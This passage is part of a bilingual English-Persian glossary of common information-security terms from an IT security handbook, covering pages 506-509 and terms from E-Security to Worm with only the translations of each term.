‫ﺍﻣﻨﻴﺖ ﺍﻟﮑﺘﺮﻭﻧﻴﮑﻲ ‪E-Security ..................................................................................................‬‬

‫ﺍﻋﺘﻤﺎﺩ ﺍﻟﮑﺘﺮﻭﻧﻴﮑﻲ ‪E-Trust .........................................................................................................‬‬

‫ﻏﺮﺑﺎﻝﺳﺎﺯﻱ ‪Filtering .................................................................................................................‬‬

‫ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ‪Firewall ..................................................................................................................‬‬

‫ﺩﺭﻭﺍﺯﻩ ‪Gateway .........................................................................................................................‬‬

‫ﺩﺭﻫﻢﺳﺎﺯﻱ‪Hash ........................................................................................................................‬‬

‫ﻓﺎﻳﻞ ﺳﺎﺑﻘﻪ ‪History File ...........................................................................................................‬‬

‫ﮐﻮﺯﺓ ﻋﺴﻞ ‪Honey Pot .............................................................................................................‬‬

‫ﺍﻣﻨﻴﺖ ﻣﻴﺰﺑﺎﻥ ‪Host Security ...................................................................................................‬‬


‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ٥٠٦

Host-Based Firewall ............................................................. ‫ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣﺒﺘﻨﻲ ﺑﺮ ﻣﻴﺰﺑﺎﻥ‬

Identification ............................................................................................................ ‫ﺷﻨﺎﺳﺎﻳﻲ‬

Identity Theft .................................................................................................... ‫ﺳﺮﻗﺖ ﻫﻮﻳﺖ‬

Incident Response Plan ............................................................... ‫ﻃﺮﺡ ﻭﺍﮐﻨﺶ ﺑﻪ ﺭﺧﺪﺍﺩ‬

Incremental Backup ............................................................................... ‫ﭘﺸﺘﻴﺒﺎﻥ ﺍﻓﺰﺍﻳﺸﻲ‬

Ingress Filters ............................................................................................ ‫ﺻﺎﻓﻴﻬﺎﻱ ﻭﺭﻭﺩﻱ‬

Insider Attack .......................................................................................... ‫ﺣﻤﻠﺔ ﻋﻨﺼﺮ ﺩﺍﺧﻠﻲ‬

Integrity ..................................................................................... (‫ﻳﮑﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ )ﺗﻤﺎﻣﻴﺖ‬

Intellectual Property .................................................................................. ‫ﻣﺎﻟﮑﻴﺖ ﻣﻌﻨﻮﻱ‬

Intruder .......................................................................................................................... ‫ﻣﻬﺎﺟﻢ‬

Intrusion Detection System ..............................................................‫ﺳﻴﺴﺘﻢ ﻣﻬﺎﺟﻢﻳﺎﺏ‬

Intrusion Response Programs ........................................ ‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻭﺍﮐﻨﺶ ﺑﻪ ﺗﻬﺎﺟﻢ‬

Jamming ........................................................................................................... ‫ﺍﺭﺳﺎﻝ ﭘﺎﺭﺍﺯﻳﺖ‬

Kernel ......................................................................................................... ‫ﻫﺴﺘﺔ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ‬

Keylogger ............................................................................................. ‫ﺛﺒﺖﮐﻨﻨﺪﺓ ﺻﻔﺤﻪﮐﻠﻴﺪ‬

Least Privilege ................................................................................ ‫ﺍﻣﺘﻴﺎﺯ ﺩﺳﺘﺮﺳﻲ ﺣﺪﺍﻗﻠﻲ‬

Load Limiting ........................................................................................ ‫ﻣﺤﺪﻭﺩﻳﺖ ﺑﺎﺭﮔﺬﺍﺭﻱ‬

Load Shedding ........................................................................................... ‫ﺗﻘﺴﻴﻢ ﺑﺎﺭﮔﺬﺍﺭﻱ‬

Log Processing .................................................................................. ‫ﭘﺮﺩﺍﺯﺵ ﻓﺎﻳﻠﻬﺎﻱ ﺛﺒﺖ‬

Logic Bomb ........................................................................................................ ‫ﺑﻤﺐ ﻣﻨﻄﻘﻲ‬

Loss Analysis ..................................................................................................... ‫ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ‬

Malformed Traffic Attacks ........................................................‫ﺣﻤﻼﺕ ﺗﺮﺍﻓﻴﮏ ﺑﺪﺷﮑﻞ‬

Malware (Malicious Software) ........................................................................... ‫ﺑﺪﺍﻓﺰﺍﺭ‬

Man-in-the-Middle Attack ..................................................... ‫ﺭﺍﻩ‬-‫ﻣﻴﺎﻥ‬-‫ﺩﺭ‬-‫ﺣﻤﻼﺕ ﻓﺮﺩ‬

Message Flooding ............................................................................................. ‫ﺳﻴﻞ ﭘﻴﺎﻣﻬﺎ‬

Message Non-Repudiation ................................................................. ‫ﻋﺪﻡ ﺗﮑﺬﻳﺐ ﭘﻴﺎﻡ‬

Metadata ...................................................................................................................... ‫ﻓﺮﺍﺩﺍﺩﻩ‬

Minimal Disclosure Certificates ........................................... ‫ﮔﻮﺍﻫﻲﻫﺎﻱ ﺍﻓﺸﺎﻱ ﺣﺪﺍﻗﻞ‬


٥٠٧ ‫ﻟﻐﺎﺕ ﻭ ﺍﺻﻄﻼﺣﺎﺕ ﺭﺍﻳﺞ ﺍﻣﻨﻴﺘﻲ‬

Mirror Disks .............................................................................................. ‫ﺩﻳﺴﮑﻬﺎﻱ ﺍﻧﻌﮑﺎﺳﻲ‬

Mobile Access Point .......................................................................... ‫ﻧﻘﻄﺔ ﺩﺳﺘﺮﺳﻲ ﺳﻴﺎﺭ‬

Mobile Risk Management ....................................................... ‫ﻣﺪﻳﺮﻳﺖ ﻣﺨﺎﻃﺮﺍﺕ ﺳﻴﺎﺭ‬

Multilevel Security ...................................................................................... ‫ﺍﻣﻨﻴﺖ ﭼﻨﺪﻻﻳﻪ‬

Nameserver .............................................................................................. ‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻧﺎﻡ‬

On-demand Filtering .................................................................... ‫ﻏﺮﺑﺎﻝﺳﺎﺯﻱ ﻫﻨﮕﺎﻡ ﻧﻴﺎﺯ‬

One-way Encryption ............................................................................ ‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻳﮑﻄﺮﻓﻪ‬

Open Source Software ............................................................................ ‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺘﻦﺑﺎﺯ‬

Overload Attacks .................................................................. ‫ﺣﻤﻼﺕ ﺑﺎﺭﮔﺬﺍﺭﻱ ﺑﻴﺶ ﺍﺯ ﺣﺪ‬

Packet Sniffing .......................................................................................... ‫ﺩﻳﺪﻩﺑﺎﻧﻲ ﺑﺴﺘﻪﻫﺎ‬

Pass Phrase ..................................................................................................... ‫ﻋﺒﺎﺭﺕ ﺭﻣﺰﻱ‬

Password ................................................................................................................... ‫ﺭﻣﺰ ﻋﺒﻮﺭ‬

Password Sniffer ..................................................................................... ‫ﺩﻳﺪﻩﺑﺎﻥ ﺭﻣﺰ ﻋﺒﻮﺭ‬

Patch ................................................................................................................................ ‫ﻭﺻﻠﻪ‬

Payload Software ................................................................................. ‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺳﺮﺑﺎﺭ‬

Penetration Testing ......................................................................................... ‫ﺁﺯﻣﻮﻥ ﻧﻔﻮﺫ‬

Permissions .............................................................................................. ‫ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ‬

Physical Token ............................................................................................... ‫ﻧﺸﺎﻥ ﻓﻴﺰﻳﮑﻲ‬

Pirated Software ........................................................................................ ‫ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺴﺮﻭﻗﻪ‬

Point of Contact ................................................................................................ ‫ﻧﻘﻄﺔ ﺗﻤﺎﺱ‬

Portscan ............................................................................................................... ‫ﭘﻮﻳﺶ ﭘﻮﺭﺕ‬

Privacy ............................................................................................................. ‫ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‬

Privacy Policy ................................................................................. ‫ﺳﻴﺎﺳﺖ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ‬

Private Address Spaces .............................................................‫ﻓﻀﺎﻱ ﺁﺩﺭﺱ ﺧﺼﻮﺻﻲ‬

Private Key ......................................................................................................‫ﮐﻠﻴﺪ ﺧﺼﻮﺻﻲ‬

Privilege ........................................................................................................... ‫ﺍﻣﺘﻴﺎﺯ ﺩﺳﺘﺮﺳﻲ‬

Process Attack ............................................................................................‫ﺗﻬﺎﺟﻢ ﭘﺮﺩﺍﺯﻩﺍﻱ‬

Programmed Threats ................................................................ ‫ﺗﻬﺪﻳﺪﺍﺕ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱﺷﺪﻩ‬


‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ٥٠٨

Public Key .......................................................................................................... ‫ﮐﻠﻴﺪ ﻋﻤﻮﻣﻲ‬

Public Key Infrastructure ........................................................... ‫ﺯﻳﺮﺳﺎﺧﺖ ﮐﻠﻴﺪ ﻋﻤﻮﻣﻲ‬

Quoting ................................................................................................................ ‫ﮔﻴﻮﻣﻪﮔﺬﺍﺭﻱ‬

Realtime .................................................................................................................... ‫ﺑﻼﺩﺭﻧﮓ‬

Reliability ........................................................................................................ ‫ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ‬

Remote Access ..................................................................................... ‫ﺩﺳﺘﺮﺳﻲ ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ‬

Restricted Calling Groups ....................................................... ‫ﮔﺮﻭﻫﻬﺎﻱ ﺗﻤﺎﺱ ﻣﺤﺪﻭﺩ‬

Risk Analysis ................................................................................................. ‫ﺗﺤﻠﻴﻞ ﻣﺨﺎﻃﺮﻩ‬

Risk Assessment ....................................................................................... ‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﺨﺎﻃﺮﻩ‬

Risk Evaluation ............................................................................................ ‫ﺑﺮﺁﻭﺭﺩ ﻣﺨﺎﻃﺮﻩ‬

Router ........................................................................................................................ ‫ﻣﺴﻴﺮﻳﺎﺏ‬

Sanitizing .................................................................................................................. ‫ﭘﺎﮐﺴﺎﺯﻱ‬

Scalability .......................................................................................................... ‫ﻣﻘﻴﺎﺱﭘﺬﻳﺮﻱ‬

Scan ................................................................................................................................ ‫ﭘﻮﻳﺶ‬

Secret Key Algorithms ............................................................. ‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﮐﻠﻴﺪ ﻣﺨﻔﻲ‬

Security Audit ................................................................................................ ‫ﻣﻤﻴﺰﻱ ﺍﻣﻨﻴﺘﻲ‬

Separation Management ...................................................................... ‫ﻣﺪﻳﺮﻳﺖ ﺗﻔﮑﻴﮏ‬

Sequence Conditions .................................................................................. ‫ﺷﺮﺍﻳﻂ ﺭﻗﺎﺑﺖ‬

Server ................................................................................................................ ‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ‬

Services .........................................................................................................................‫ﺧﺪﻣﺎﺕ‬

Session Hijacking .......................................................................................... ‫ﺳﺮﻗﺖ ﺟﻠﺴﻪ‬

Session Key ......................................................................................................... ‫ﮐﻠﻴﺪ ﺟﻠﺴﻪ‬

Shadow Password Files ................................................. ‫ﻓﺎﻳﻠﻬﺎﻱ ﺳﺎﻳﻪﺍﻱ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ‬

Snapshot ................................................................................................................ ‫ﺗﺼﻮﻳﺮ ﺁﻧﻲ‬

Snooping Tool ................................................................................................ ‫ﺍﺑﺰﺍﺭ ﺟﺎﺳﻮﺳﻲ‬

Social Engineering ................................................................................ ‫ﻣﻬﻨﺪﺳﻲ ﺍﺟﺘﻤﺎﻋﻲ‬

Spam .............................................................................................................................‫ﻫﺮﺯﻧﺎﻣﻪ‬

Spoofing ................................................................................................................ ‫ﮔﻤﺮﺍﻩﺳﺎﺯﻱ‬


٥٠٩ ‫ﻟﻐﺎﺕ ﻭ ﺍﺻﻄﻼﺣﺎﺕ ﺭﺍﻳﺞ ﺍﻣﻨﻴﺘﻲ‬

Symmetric Encryption ......................................................................... ‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ‬

Threat .............................................................................................................................. ‫ﺗﻬﺪﻳﺪ‬

Token ............................................................................................................................... ‫ﻧﺸﺎﻥ‬

Trojan Horses ....................................................................................................... ‫ﺍﺳﺐ ﺗﺮﺍﻭﺍ‬

Two Factor Authentication ....................................................... ‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﻭ ﻋﺎﻣﻠﻲ‬

Unauthorized Access ........................................................................... ‫ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎﺯ‬

User ................................................................................................................................... ‫ﮐﺎﺭﺑﺮ‬

User Account ................................................................................................ ‫ﺣﺴﺎﺏ ﮐﺎﺭﺑﺮﻱ‬

Username ............................................................................................................. ‫ﻧﺎﻡ ﮐﺎﺭﺑﺮﻱ‬

Virtual Private Network .............................................................. ‫ﺷﺒﮑﺔ ﺧﺼﻮﺻﻲ ﻣﺠﺎﺯﻱ‬

Virus ...............................................................................................................................‫ﻭﻳﺮﻭﺱ‬

Virus Signatures ....................................................................................... ‫ﻧﺸﺎﻧﻬﺎﻱ ﻭﻳﺮﻭﺱ‬

Vulnerability ....................................................................................................... ‫ﺁﺳﻴﺐﭘﺬﻳﺮﻱ‬

Wireless Access Point ................................................................. ‫ﻧﻘﻄﺔ ﺩﺳﺘﺮﺳﻲ ﺑﻲﺳﻴﻢ‬

Wiretapping .............................................................................................. ‫ﺍﺳﺘﺮﺍﻕ ﺳﻤﻊ ﺗﻠﻔﻨﻲ‬

Workstation ..................................................................................................... ‫ﺍﻳﺴﺘﮕﺎﻩ ﮐﺎﺭﻱ‬

Worm ................................................................................................................................... ‫ﮐﺮﻡ‬

You might also like